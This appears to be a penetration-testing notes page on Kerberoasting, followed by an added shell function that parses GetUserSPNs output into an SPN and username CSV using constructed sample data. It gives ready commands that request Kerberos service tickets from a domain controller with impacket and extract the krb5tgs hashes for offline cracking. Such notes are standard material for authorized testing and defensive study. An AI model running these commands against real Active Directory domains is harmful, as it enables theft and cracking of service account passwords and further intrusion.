Kerberoasting
Kerberoast Affected SPNs (NTLM)
impacket-GetUserSPNs -request -save $ADDOMAIN/$ADUSER -dc-ip $ADCONTROLLER | tee GetUserSPN-Output.txt
Get only tickets for cracking
cat GetUserSPN-Output.txt | grep "krb5tgs" >> kerb.hash
Create affected SPN CSV
cat GetUserSPN-Output.txt | grep 'CN=' | awk -F' ' 'NR==1{print "SPN,Username"};{print $1","$2}' >> Kerberoastable-User-Account.csv
The above may miss SPNs whose row has no "MemberOf" value, because the grep matches on 'CN=' (I have seen this on a test before). Also, if you have two otherwise identical SPNs where one has the port at the end and the other does not, both will be reported.
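Added example (not part of the original page): a shell function that builds the same SPN,Username CSV by slicing the table on its dashed rule row instead of grepping for 'CN=', so rows with an empty MemberOf are kept and SPNs that differ only by a trailing port are reported once. It assumes the saved output keeps the aligned table layout that GetUserSPNs prints; spn_csv, sample_output and the corp.test data are constructed for illustration.

```bash
#!/usr/bin/env bash
# Constructed sample in the GetUserSPNs table layout (not real output):
# row 3 has an empty MemberOf; rows 1 and 2 differ only by the :1433 port.
sample_output() {
cat <<'EOF'
ServicePrincipalName           Name     MemberOf                       PasswordLastSet             LastLogon  Delegation
-----------------------------  -------  -----------------------------  --------------------------  ---------  ----------
MSSQLSvc/sql01.corp.test:1433  svc_sql  CN=SQL Admins,DC=corp,DC=test  2023-01-10 09:15:02.000000  <never>
MSSQLSvc/sql01.corp.test       svc_sql  CN=SQL Admins,DC=corp,DC=test  2023-01-10 09:15:02.000000  <never>
HTTP/web01.corp.test           svc_web                                 2022-06-01 12:00:00.000000  <never>

$krb5tgs$23$*svc_sql$CORP.TEST$<constructed placeholder>
EOF
}

# Print "SPN,Username" CSV from table output given as files or on stdin.
# Assumption: columns are aligned under a rule row made of dashes.
spn_csv() {
  awk '
    function trim(s) { gsub(/^[ \t]+|[ \t]+$/, "", s); return s }
    BEGIN { print "SPN,Username" }
    # Rule row: record the start and width of every column.
    /^-+( +-+)+ *$/ {
      n = 0; pos = 1; rest = $0
      while (match(rest, /-+/)) {
        n++; start[n] = pos + RSTART - 1; width[n] = RLENGTH
        pos += RSTART + RLENGTH - 1
        rest = substr(rest, RSTART + RLENGTH)
      }
      in_table = 1; next
    }
    # A blank line or a hash line ends the table.
    in_table && (/^[ \t]*$/ || /krb5tgs/) { in_table = 0 }
    in_table {
      spn  = trim(substr($0, start[1], width[1]))
      user = trim(substr($0, start[2], width[2]))
      if (spn == "" || user == "") next
      # Dedupe on the SPN without a trailing :port, per account.
      key = tolower(spn); sub(/:[0-9]+$/, "", key)
      key = key SUBSEP tolower(user)
      if (!(key in seen)) { seen[key] = 1; print spn "," user }
    }
  ' "$@"
}

sample_output | spn_csv
```

Against the saved file: spn_csv GetUserSPN-Output.txt > Kerberoastable-User-Account.csv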